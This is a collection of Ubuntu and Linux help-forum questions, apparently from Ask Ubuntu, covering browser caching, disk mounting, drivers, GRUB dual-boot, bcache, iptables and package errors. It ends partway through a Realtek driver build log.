523108	why does firefox ignore the `304 not modified` status sent by the webserver ?	for my site , firefox 32.0 seems not to cache a css file of my nikola 7.1.0 installation and ignores the 304 not modified response by the webserver . what also puzzles me , is that it sends the 2nd request with a different accept : header . chrome 37.0 does not show this behaviour and only requests the file once . the first http request firefox sends is : get /assets/css/all-nocdn.css http/1.1 accept : text/css , */* ; q=0.1 accept-encoding : gzip , deflate accept-language : en-gb , en ; q=0.5 authorization : … cache-control : max-age=0 connection : keep-alive host : … if-modified-since : mon , 14 jul 2014 09:12:55 gmt if-none-match : `` 2838446235 '' referer : … user-agent : mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:32.0 ) gecko/20100101 firefox/32.0 http/1.1 304 not modified content-type : text/css date : fri , 12 sep 2014 07:18:02 gmt etag : `` 2838446235 '' last-modified : mon , 14 jul 2014 09:12:55 gmt server : lighttpd/1.4.35 strict-transport-security : max-age=31536000 ; includesubdomains vary : accept-encoding and the next http request is : get /assets/css/all-nocdn.css http/1.1 accept : text/html , application/xhtml+xml , application/xml ; q=0.9 , */* ; q=0.8 accept-encoding : gzip , deflate accept-language : en-gb , en ; q=0.5 authorization : … cache-control : no-cache connection : keep-alive host : … pragma : no-cache user-agent : mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:32.0 ) gecko/20100101 firefox/32.0 http/1.1 200 ok accept-ranges : bytes content-encoding : gzip content-length : 22700 content-type : text/css date : fri , 12 sep 2014 07:26:42 gmt etag : `` 2838446235 '' last-modified : mon , 14 jul 2014 09:12:55 gmt server : lighttpd/1.4.35 strict-transport-security : max-age=31536000 ; includesubdomains vary : accept-encoding … ( i actually replayed this using httpie , because firefox does not allow to copy the server response as a whole . copying the request headers is possible by clicking `` edit and resend '' . ) what could be reasons for that behaviour ? does firefox offer a way to see the reason for a http request ? ( what chrome calls `` initiator '' . ) please have a look at my screenshot of the network section of the firefox developer toolbar to see an overview of all requests in the timeline :
523109	data distribution after adding additional disk in raid 5	`` i had set up raid 5 by equal capacity with 3 hard disks in ubuntu 12.04 and i need to perform scaling.after adding 1 disk , how to monitor the data distribution and possible inputs.is it possible ? ''
523110	create a directory during .deb installation with read write access rights using cmaklist.txt	i need to create a directory at the path /opt/ with read write permission for everyone ( 777 permission ) during .deb installation on ubuntu 14.04 , 64 bit . i have no root login on my machine so i can get the root access by sudo and i am installing the .deb with sudo on my machine . right now i am using : sudo chmod -r 777 /opt/mydirectory/ but i want that this directory create with read write permission for everyone . i am using the command : install ( targets app runtime destination /opt/mydirectory ) in my cmakelist.txt file . thanks .
523112	evince does not go to the next occurance of a searched string	in evince , i follow the following steps to search a string in the document : press ctrl-f type the string press ctrl-g to go to the next occurrence . evince gets stuck at the same page as i keep on pressing ctrl-g . i am using ubuntu 14.04 lts
523115	join ubuntu 14.04 to ad error	i tried to join an ubuntu 14.04 machine to ad , but when i try to install likewise-open i get this error : e : package 'likewise-open ' has no installation candidate # sudo apt-get install likewise-open [ sudo ] password for demo : lecture des listes de paquets ... fait construction de l'arbre des dăšpendances lecture des informations d'ăštat ... fait package likewise-open is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libwbclient0 e : package 'likewise-open ' has no installation candidate
523116	how to install skype in ubuntu 12.04.5 lts	i am trying to install skype on ubuntu 12.02.05 . however , i get an error message : rails @ rails-desktop : ~/downloads $ sudo dpkg -i skype-ubuntu-precise_4.2.0.11-1_i386.deb sudo : /var/lib/sudo writable by non-owner ( 040777 ) , should be mode 0700 [ sudo ] password for rails : dpkg : error processing skype-ubuntu-precise_4.2.0.11-1_i386.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : skype-ubuntu-precise_4.2.0.11-1_i386.deb rails @ rails-desktop : ~/downloads $ how can i solve this ?
523117	kivy window handle	how can i get window handle in kivy framework ? if i want to render something to specific area or in specific window/widget how can i specify that ? for example in gtk+ i use this to get window handle self.xid = self.drawingarea.get_property ( 'window ' ) .get_xid ( ) how can i achieve this in kivy or is there different approach
523118	which samba user for gvfs-mount ( 12.04 )	i mounted some samba shares in ubuntu 12.04 using nautilus , by clicking the share under `` network '' . i 've googled , but i ca n't find anywhere how to : which remote samba user were my shares mounted by ? how can i `` forget '' the credentials i were using and authenticate again ? thanks .
523120	bass speaker initially not works	on samsung 550p5c initially bass speaker is off . mute/unmute make it working . how to configure it to work permanent ? xubuntu 14.04/64
523121	ubuntu 14.04 blank screen after install vga driver ati radeon	i got problem after install ubuntu 14.04 , the screen resolution can not change to other size . and then i install vga ati radeon driver from software store . after installed the driver and reboot the system , ubuntu purple screen and i ca n't do anything ( hang ) . can you help about this problem ?
523122	mouse is blinking/flickering at my built in monitor with an external monitor , please help	i am using a thinkpad w530 , and due to my works , i need to use an external monitor . i am using nouveau and nvidia-prime to switch between intel and nvidia adapter . after i connected and switched on the external monitor ( an acer al1716 ) my cursor start to be flickering/blinking at my built in monitor . whenever i switch off the external monitor , the cursor is nice again . i have read some questions about this issue , the solution is switch off the external monitor . however , i need to use external monitor . could anyone help me ? thanks
523125	i want to learn java	i want to get my java programming skills up to speed . i 'm basically looking for something that i can work through and thereby learn java coding techniques . i 've had a look at the ubuntu software centre , and the warnings posted there were enough to scare me off . i assume i need sun 's java sdk , but which version ? i also need a programming front-end and some lessons to go through ... i already have an old copy of java for dummies : ) i 'm running ubuntu 14.04 lts . thanks !
523128	how to use twitter bootstrap	i had installed twitter bootstrap in my program as rails g bootstrap : layout [ layout_name ] what should be the [ layout_name ] and rails g bootstrap : themed [ resource_name ] what should be [ resource_name ]
523129	how to use multiple xscreen ?	i have a setup with 2 different nvidia cards and 3 monitors . i was using xinerama to unite them all under the same desktop , but some random crashes and lots of googling lead me to believe that xinerama is the cause . so i have changed the setup to have one xscreen with two monitors ( and the kde task manager bar ) , and another xscreen , which is completely blank . i can start apps on the 2nd xscreen by typing `` display=:0.1 konsole '' but there 's no decoration bar on top of the window , and mouse events do n't seem to reach it : i ca n't click on it so i can type . same if i start firefox . so how i do i use that 2nd xscreen ? can i place another kde task manager bar on it ?
523133	how can i log pre-process resource usage ?	i am encountering a reproducible system slowdown when i perform a given action on the desktop . i have observed some odd behaviour running top and iotop in separate ttys . how can i log resource usage per-process so that i can identify any bad actors during that time ?
523135	lubuntu 14.04.1 login screen resolution is not perfect	i have recently done a fresh installation ( not dual boot ) of lubuntu 14.04.1 lts i386 on my desktop . now the problem is , my screen resolution is 1366x768 , i.e . i am using a wide screen monitor and when the system starts and after booting the login screen appears , it is showing a bad resolution . it looks like the screen is compressed from right to left side and almost 1/3rd of the screen portion from the right side is black and remaining 2/3rd is the login screen . but if i logged is successfully the resolution of the desktop is showing perfect , i.e . 1366x768 . can anyone help me with this problem ? why the login screen resolution is not showing perfectly while the desktop resolution is perfect ? my machine configuration is : 2gb ddr2 ram , 80gb sata hdd , gigabyte motherboard , intel g45 graphics chipset , realtek hd audio , aoc 15.6 inch wide screen monitor ... . i have already updated all the softwares and also installed the latest intel graphics driver from this website - https : //01.org/linuxgraphics/downloads . i have downloaded the `` graphics installer 1.0.6 for ubuntu* 14.04 , 32-bit '' and installed the file perfectly . still the same ! !
523138	**how to copy the ubuntu from cd to pen drive**	this is to bring to inform you that , i would like to copy the ubuntu from cd to pendrive which i was trying every time very hard please the answer for what i do
523139	how to write a script with nautilus actions ?	i want to use nautilus actions with my own script which i have usually started successfully with open-terminal and pasting the command ( s. below ) directly in the terminal . for file in *.mp4 ; do mkdir `` $ { file % .mp4 } '' ; mv `` $ { file } '' ./ '' $ { file % .mp4 } '' ; done using nautilus config tool now , i do not know how to insert the command in the dedicated field ( see picture 1 ) or how to write an adequate bash script file ( see picture 2 ) . can someone give a hint ? picture 1 : attempt to load script ( below ) over .gnome2/nautilus-scripts picture 2 : attempt to write a script
523141	budgie desktop panel transparency	i installed budgie desktop on my ubuntu 14.04 from official ppa . but panel is not transparent . its just white . how can i make it transparent ?
523142	does it exsit a presentation mode , with next slide and counter for a pdf ?	if you do your slides with libreoffice , when you see the diaporama with a double screen option , people see your slides on the screen where there are projected , and you see the current slide , the next one and a time counter on your laptop . is there a way to do the same thing with a pdf viewver ? i usually do my presentation with latex and beamer and such a feature of libreoffice is interesting .
523143	how can i configure lenovo s540 touchpad on ubuntu 14.04 ?	i have just installed ubuntu 14.04 on my lenovo thinkpad s540 . the problem is i have a touchpad all in one click ( no seperate buttons ) and the standard configuration is screwed up . it 's almost impossible to right click and sometimes when i left click is does right click . so i have to use a mouse otherwise i 'm forced to use windows where the settings are just ok. also i can not create a new document on /usr/share/x11/xorg.conf.d so i 'm forced to adjust one of the files . does anyone have a solution ?
523144	juju how to resolve this error `` error can not assign unit `` xxxx '' to machine 1 : series does not match ''	after to make the upgrade of maas via ppa stable and installed juju by ppa stable , during the deploy of the service i 've received this error $ : juju deploy -- to 1 mysql added charm `` cs : trusty/mysql-4 '' to the environment . error can not assign unit `` mysql/0 '' to machine 1 : series does not match while deployed juju-gui and puppetmaster it works fine , i tried also with other service and the problem is the same . juju deploy -- to 1 rabbitmq-server added charm `` cs : trusty/rabbitmq-server-7 '' to the environment . error can not assign unit `` rabbitmq-server/0 '' to machine 1 : series does not match some one have resolved that ?
523145	getting function keys work on samsung ativ 9	i have 14.04 on a samsung ativ 9 and some of the function keys are not working . they are for wireless , fan and keyboard backlight . i found some instructions here : http : //blog.nonobis.nl/ ? p=11 and here : samsung new series 9 , not all function keys working but they do n't seem to be compatible with 14.04 , for example there is no directory like /lib/udev/keymaps . there is also a ppa but it does n't work either .
523146	switching between open application windows	i just updated my ubuntu version to 14.04 lts and the key combination 'alt + tab ' does not work anymore to switch between open windows . i tried to redefine them by means of the keyboard shortcuts but was not successful as i tried a few combinations ( including alt+tab ) but no one of them works . any new trick ? thanks a lot .
523147	sudo apt-get update fails	get update` comand dosent work it gets fails , sorry new to ubuntu w : failed to fetch htt p : //ppa.launchpad.net/jolicloud-team/ppa/ubuntu/dists/saucy/main/source/sources 404 not found w : failed to fetch htt p : //ppa.launchpad.net/jolicloud-team/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch htt p : //ppa.launchpad.net/jolicloud-team/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch htt p : //ppa.launchpad.net/makson96/fglrx/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch htt p : //ppa.launchpad.net/makson96/fglrx/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch htt p : //ppa.launchpad.net/upubuntu-com/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch htt p : //ppa.launchpad.net/upubuntu-com/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/webupd8team/jupiter/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/webupd8team/jupiter/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
523149	how do i make a windows-style cls script for ubuntu ?	how do i make a cls-type command for ubuntu/linux that will not only clear the terminal emulator screen , but also make it so you ca n't scroll up to see the stuff you cleared ? note that the clear command does not eliminate the text . it just scrolls it up out of view . also , any information about setting it up as a system-wide command , called cls would be helpful ( especially nice for windows users coming to linux ) .
523151	how to use latex symbols in scidavis ?	how can i use latex symbols in scidavis . is there any way i can export the scidavis graphs to tex or tikz compatible tex ? please help
523157	hibernation works only when connected to ac power	please help me understand this part of syslog when i try to wake up from hibernation . my specification - 4 gb of ram , 8 gb of linux-swap , intel core i5-4200u , nvidia geforce gt 750m . the problem is as follows - my laptop wakes up eventually , but there is no use of hibernation as all processes get killed and i basically start as if i had shut down my computer . also sometimes it does not wake up at all . somewhere in the middle of the log are the lines that say that process cinnamon is getting killed . http : //pastebin.com/nhewn8xp
523158	volume buttons do n't work when connected to bluetooth hifi adapter	i have ubuntu 14.04 installed on my laptop . when i play audio via the laptop speakers , i can use the keyboard buttons to change the volume . i have a philips bluetooth hifi adapter to play music from laptop and phone over my stereo . when i do this , the volume buttons on the laptop do n't work , and then i need to change the volume using the mouse and the volume slider . is there a way to get the volume buttons working when using bluetooth ?
523163	how to set a hard drive to mount it automatically at boot time ?	i have 2 hard drives on my machine but i need to mount them manually after the boot from nautilus by clicking on them . how can i define their settings to mount them automatically at boot time ? thanks : )
523165	front panel audio jack not working	i have a problem with my front panel audio jack . it is not working after i plug in my headphones . the rear jack is working fine with the speakers . i have recently upgraded to ubuntu after expiry of windows xp pro and learning to use a totally new o/s which i am not very familiar with . i checked for answers for configuration on the front panel audio jack that is to add the line in alsa-base.conf file with this == > options snd-hda-intel model=auto i did and alsa force-reload and reboot but there is still no sound from my front panel audio jack . i know it is working since i had dual boot with windows xp prior to this and it worked fine in windows with no problem . can someone help me ? my audio system is realtek hd audio build-in with via chipset . thank you .
523167	why is my desktop the same as home folder ?	my desktop ( not the /home/user/desktop folder ) shows the contents of my /home/user folder . i do n't know how i have done it and can i have some help on undoing it ? the /home/user/desktop folder just contains my desktop files which do not appear on my desktop .
523168	bcache is not caching all drives	i have 3 hdd and 1 ssd , i have successfully mounted all drives to bcache . pavs @ vas : ~ $ df -h filesystem size used avail use % mounted on /dev/sda1 132g 35g 90g 28 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 8.0k 3.9g 1 % /dev tmpfs 786m 2.3m 784m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 152k 3.9g 1 % /run/shm none 100m 52k 100m 1 % /run/user /dev/bcache1 2.7t 2.1t 508g 81 % /var/www/html/directlink/ftp1 /dev/bcache2 1.8t 614g 1.2t 36 % /var/www/html/directlink/ftp2 /dev/bcache0 1.8t 188g 1.6t 11 % /var/www/html/directlink/ftp3 /dev/sdf1 367g 284g 65g 82 % /media/pavs/e93284df-e52e-4a5d-a9e1-323a388b332f but according to bcache stats two of the drives are caching but the third one isnt ( bcache1 ) bcache0 pavs @ vas : ~ $ tail /sys/block/bcache0/bcache/stats_total/* == > /sys/block/bcache0/bcache/stats_total/bypassed < == 161g == > /sys/block/bcache0/bcache/stats_total/cache_bypass_hits < == 4440257 == > /sys/block/bcache0/bcache/stats_total/cache_bypass_misses < == 0 == > /sys/block/bcache0/bcache/stats_total/cache_hit_ratio < == 69 == > /sys/block/bcache0/bcache/stats_total/cache_hits < == 1360041 == > /sys/block/bcache0/bcache/stats_total/cache_miss_collisions < == 426 == > /sys/block/bcache0/bcache/stats_total/cache_misses < == 587356 == > /sys/block/bcache0/bcache/stats_total/cache_readaheads < == 0 bcache1 pavs @ vas : ~ $ tail /sys/block/bcache1/bcache/stats_total/* == > /sys/block/bcache1/bcache/stats_total/bypassed < == 0 == > /sys/block/bcache1/bcache/stats_total/cache_bypass_hits < == 0 == > /sys/block/bcache1/bcache/stats_total/cache_bypass_misses < == 0 == > /sys/block/bcache1/bcache/stats_total/cache_hit_ratio < == 0 == > /sys/block/bcache1/bcache/stats_total/cache_hits < == 0 == > /sys/block/bcache1/bcache/stats_total/cache_miss_collisions < == 0 == > /sys/block/bcache1/bcache/stats_total/cache_misses < == 0 == > /sys/block/bcache1/bcache/stats_total/cache_readaheads < == 0 bcache2 pavs @ vas : ~ $ tail /sys/block/bcache2/bcache/stats_total/* == > /sys/block/bcache2/bcache/stats_total/bypassed < == 193g == > /sys/block/bcache2/bcache/stats_total/cache_bypass_hits < == 4329693 == > /sys/block/bcache2/bcache/stats_total/cache_bypass_misses < == 0 == > /sys/block/bcache2/bcache/stats_total/cache_hit_ratio < == 74 == > /sys/block/bcache2/bcache/stats_total/cache_hits < == 1859198 == > /sys/block/bcache2/bcache/stats_total/cache_miss_collisions < == 232 == > /sys/block/bcache2/bcache/stats_total/cache_misses < == 650958 == > /sys/block/bcache2/bcache/stats_total/cache_readaheads < == 0 i am new to bcache so i obviously missed something , what did i miss and please help me find the solution . let me know if you need any more information .
523174	virtualbox extension pack version ?	i have installed virtualbox from the repository on ubuntu 12.04 . i would like support for usb 2.0 devices , so the virtualbox extension pack must be installed . however , i 'm not sure which version is the correct one . the virtualbox version installed is 4.1.12_ubuntu , does this mean that i should download version 4.1.12 of the extension pack from official website ? or should it be the latest 4.1.x ? i 'm not sure how the ubuntu version scheme compares with the official one . does anyone know the correct version to install ?
523175	faulty url routing from various utilities	various utilities w/in plasma eg '' k '' menu '' plasma desktop shell add-on installer '' have actions that send a url to the default browser but what i 'm getting is eg : file : ///var/tmp/kdecache-me/krun/31345_0_ and file : ///var/tmp/kdecache-steeve/krun/31488_0_linear-aurora-154753031
523178	mount : wrong fs type , bad option , bad superblock on . .	i am trying to auto mount 2 hard drives on a newly setup desktop . i just installed ubuntu 14.04 ran the updates and then immediately went to the disk gui in ubuntu and set the auto mount on the ext4 partitions to auto mount . i then reboot and the system then tells me just before it gets to the desktop that there was a problem mounting a drive and i can skip or go to recovery . i will skip and the 2nd hard drive will give the same message and then i skip . after which i get to the desktop and then i can not access the drives . when it tries to mount i will get an error that will read in essence mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper gram , or other error n some cases useful info is found in syslog - try dmesg | tail or so '' . i do n't have a screen shot of the message but this is what it says when i do a mount -a from the terminal . once i remove the auto mount setting i can then mount the drives by clicking on them in the file manager window . i am a newbie to linux and ubuntu so i am at a loss . . .
523179	dual boot : ca n't boot arch linux	my history i got a pc with intel 64 bit processor . there i have installed ubuntu 14.04 lts at /dev/sdb1 and arch linux at /dev/sda1 . both swap onto /dev/sdb2 . i tried ( with succes ) to install arch linux onto a sd-card ( /dev/sdc ) for my raspberry pi . there i tried to install vim to the sd-card using pacstrap . this produced a few errors . then i plugged off my sd-card reader . after rebooting my pc i saw a grub_rescue > promt . and the line : error : no such device:5a28b060-333c-479a-b5ed-58a7b9d8ae77 . this is the uuid of my ubuntu partition ( /dev/sdb1 ) my first try then i used my amd64 boot repair disc and installed grub onto /dev/sdb . then i had to disable /dev/sda in the bios and ubuntu is booting nicely . arch was'nt shown up at this moment . then i ran sudo update-grub and rebooted . then arch linux was shown up but if i selected arch on /dev/sda1 my satadisc or somthing like that produced a ugly sound and my pc rebooted . the output was : ~ $ sudo update-grub grub-konfigurationsdatei wird generiert âś # generating grub.cfg linux-abbild gefunden : /boot/vmlinuz-3.13.0-35-generic # linux-image found initrd-abbild gefunden : /boot/initrd.img-3.13.0-35-generic linux-abbild gefunden : /boot/vmlinuz-3.13.0-34-generic initrd-abbild gefunden : /boot/initrd.img-3.13.0-34-generic linux-abbild gefunden : /boot/vmlinuz-3.13.0-33-generic initrd-abbild gefunden : /boot/initrd.img-3.13.0-33-generic linux-abbild gefunden : /boot/vmlinuz-3.13.0-32-generic initrd-abbild gefunden : /boot/initrd.img-3.13.0-32-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin arch auf /dev/sda1 gefunden # found arch on /dev/sda1 erledigt # done interesting is that grub says only 'found arch on /dev/sda1 ' . my second try then i tried to install grub onto /dev/sda and activated sda in the bios . then my machine produced again this ugly sound and i had to start again with the boot repair disc my fourth try is this here . i checked the /boot folder of arch and of ubuntu the differents are : -arch has got two initramfs.img ( one is fallback ) images -ubuntu has got a few initrd.img images ( different versions ) -ubuntu has got a few system.map files ( see above ) -ubuntu has got a few config files ( again for the different versions ) -ubuntu has got a few 'abi ' files ( what 's that ? ) and the filesystem of my arch-partition is not damaged . by the way i do n't want to reinstall arch because my installation is at a point where it would be really a lot work to rebuild the system . could it be that my mbr of /dev/sda are damaged ? now i want to be able again to start both operating systems properly .
523182	iptables does n't change the destination ip	i have a simple iptables rule : iptables -t nat -a prerouting -i eth2 -p tcp -- dport 3389 -j dnat -- to 192.168.10.102 note that my default gateway to internet is eth1 ( eth2 is a secondary link ) . in this case the redirect does n't work . i made a log using raw table and the incoming connections that match this rule do n't change the destination ip at the nat table . however if i change my default gateway from eth1 to eth2 everything works fine . so the iptables was not able to change the destination ip if the incoming interface is not part of the default gateway .
523184	account blocked by changing the /etc/passwd : how to revert or gain access again	to get root access to my existing account in ubuntu i followed this post . but even after following the steps mentioned i was n't able to create/modify file or directory without using the sudo keyword . then i found one post which suggested that i can change the /etc/passwd and modify my username to match root : x:0:0 : root : /root : /bin/bash . i followed , rebooted the system and then instead of my name in the welcome screen i saw the guest instead . while searching the net i found that root user is locked in ubuntu . because i modified my username to match the root user , even my account is locked ( i think ) . how can i get it back ? sudo is not working with guest account ( as expected )
523185	14.04 update broke my ruttorent setup	i just updated my system and now my rutorrent is n't working . when i go to the web page , i get this error js error : [ http : //192.168.0.36/rutorrent/js/jquery.js : 2 ] typeerror : a is null i googled it and all it says is that if fixed itself after a reboot for someone else . tried that , not for me . i am using nginx as a web server for rutorrent . i installed it using these instructions http : //vassie.me/rtorrent-and-rutorrent-on-ubuntu-server-with-nginx/ any ideas ?
523186	update vlc source code , on which ace player hd is based ?	i use ace player hd for watching online videos from torrents , but the version for ubuntu is based on some obsolete version of vlc which is very buggy ( e.g . green screen while watching mkv files ) . how can i re-base ape to newer vlc , if i only have deb packages of ace player hd ?
523187	wubi compares 14.04 md5sum with md5sum from 14.04.1 file	i downloaded lubuntu-14.04.1-desktop-i386.iso . the calculated md5sum is : 281fc36d625f7ca0704297b3b811fa66 . according to help.ubuntu.com/community/ubuntuhashes that is the correct md5sum . also according to cdimage.ubuntu.com/lubuntu/releases/14.04.1/release/lubuntu-14.04.1-desktop-i386.metalink that is the correct md5sum . but wubi downloads instead ... /14.04/release/lubuntu-14.04-desktop-i386.metalink , that is the 14.04 version with a different md5sum here is the wubi.log showing this : 09-12 12:01 info distro : found a valid iso for lubuntu : f : \lubuntu-14.04.1- > desktop-i386.iso 09-12 12:01 debug tasklist : new task get_metalink 09-12 12:01 debug tasklist : # # # # running get_metalink ... 09-12 12:01 debug downloader : downloading ... /lubuntu/releases/14.04/release/lubuntu-**14.04**-desktop-i386.metalink > c : \ubuntu\install ... 09-12 12:01 debug downloader : download finished ( read 1043 bytes ) ... 09-12 12:01 error commonbackend : the md5 of the metalink does match 09-12 12:01 error commonbackend : can not authenticate the metalink file , it might be corrupt none 09-12 12:01 debug tasklist : # # # # finished get_metalink 09-12 12:01 debug tasklist : new task get_file_md5 09-12 12:01 debug tasklist : # # # # running get_file_md5 ... 09-12 12:02 debug tasklist : # # # # finished get_file_md5 09-12 12:02 error commonbackend : invalid md5 for iso f : \lubuntu-14.04.1-desktop- > i386.iso ( b0d1c58c8515ab40382d01f59655ba85 ! = 281fc36d625f7ca0704297b3b811fa66 ) how do i solve this ?
523188	which installation type should i choose	i am trying to install ubuntu for first time to try it . i have an empty 49gb partition created by xp when installed . i have got to intallation type and selected 'something else' i now have /dev/sda /dev/sda1 ntfs /dev/sda2 ntfs under that i have new partition table/add/change etc under that i can choose 'device for boot loader installation' there seems to be multiple combinations to choose and i do n't know what boot loader means . can you suggest what my best choice ( s ) would be please ?
523193	regarding extended partition of hard disk after installing ubuntu	sir , i want to create some extended partitions of my drive.i have already created 3 primary partitions viz . 30 gb , 30 gb and 252 gb . but when i 'm creating extra partitions , there is showing an alert of `` you 've already created 3 primary partitions '' . in next partition of 252 gb , there is no option of extended . so how can i create the partitions . please help me out . thanks
523197	rtl8188cus unable to install 14.04	tried to compile driver from realtek . getting following error messages . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # realtek wi-fi driver auto installation script novembor , 21 2011 v1.1.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # decompress the driver source tar ball : rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911.tar.gz rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/ * * rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/halpwrseqcmd.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/clean rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 authentication requested [ root ] for make clean : rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr rm -fr module.markers ; rm -fr modules.order cd core/efuse ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd core ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c/usb ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : make arch=i386 cross_compile= -c /lib/modules/3.13.0-36-generic/build m=/home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-36-generic' cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_cmd.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_security.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_debug.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_io.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_query.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_set.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ieee80211.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme_ext.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_wlan_util.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_pwrctrl.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_rf.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_recv.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sta_mgt.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ap.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_xmit.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_p2p.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_tdls.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_br_ext.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_iol.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sreset.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/efuse/rtw_efuse.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_intf.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_com.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_hal_init.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_phycfg.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rf6052.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_dm.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rxdesc.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_cmd.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_halinit.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_led.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_xmit.o cc [ m ] 